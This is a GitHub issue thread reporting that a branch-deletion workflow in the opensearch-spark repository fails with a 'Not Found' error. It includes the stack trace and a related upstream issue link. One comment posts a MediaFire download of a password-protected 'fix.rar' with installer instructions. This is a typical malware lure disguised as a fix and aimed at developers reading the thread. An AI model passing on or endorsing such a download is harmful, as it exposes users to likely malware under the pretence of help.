### ISSUE TITLE
[BUG] GitHub workflow fails to delete backport PR branch after merge

### ISSUE THREAD

**Issue by dai-chen** [opensearch-project/opensearch-spark#599]
**What is the bug?**

The GitHub workflow is not automatically deleting the backport PR branch after the backport PR has been successfully merged. This results in the accumulation of unnecessary branches in the repository, leading to clutter and potential confusion.

**How can one reproduce the bug?**

1. Trigger a backport PR using the GitHub workflow.
2. Merge the backport PR.
3. Observe that the branch associated with the backport PR is not deleted automatically.

**What is the expected behavior?**

After merging the backport PR, the associated branch should be automatically deleted by the GitHub workflow, keeping the repository clean and organized.

**Do you have any additional context?**

This issue may be related to the configuration of the GitHub workflow or the settings applied to the repository. Here is a failed workflow action example: https://github.com/opensearch-project/opensearch-spark/actions/runs/10534481513/job/29192200189.

```
01:14:46.820Z ERROR event: Not Found (id=f7655ab4-6192-446a-ad4d-f7e01fd088ec)
  HttpError: Not Found
      at /home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:15192:23
      at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at Array.forEach (<anonymous>)
    at Logger._applySerializers (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:27073:35)
    at mkRecord (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:27186:17)
    at Logger.error (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:27252:19)
    at Application.<anonymous> (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:84794:33)
    at step (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:84675:23)
    at Object.throw (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:84656:53)
    at rejected (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:84648:65)
      at async Job.doExecute (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:23942:18)
  --
  event: {
    "event": "pull_request.closed",
    "id": "f7655ab4-6192-446a-ad4d-f7e01fd088ec",
    "repository": "opensearch-project/opensearch-spark"
  }
Error: Action failed with error: Not Found
01:[14](https://github.com/opensearch-project/opensearch-spark/actions/runs/10534481513/job/29192200189#step:2:15):46.821Z ERROR probot: Not Found
  HttpError: Not Found
      at /home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:[15](https://github.com/opensearch-project/opensearch-spark/actions/runs/10534481513/job/29192200189#step:2:16)192:23
      at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
      at async Job.doExecute (/home/runner/work/_actions/SvanBoxel/delete-merged-branch/main/dist/index.js:23942:18)
```

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dai-chen** [comment]
Related: https://github.com/SvanBoxel/delete-merged-branch/issues/257
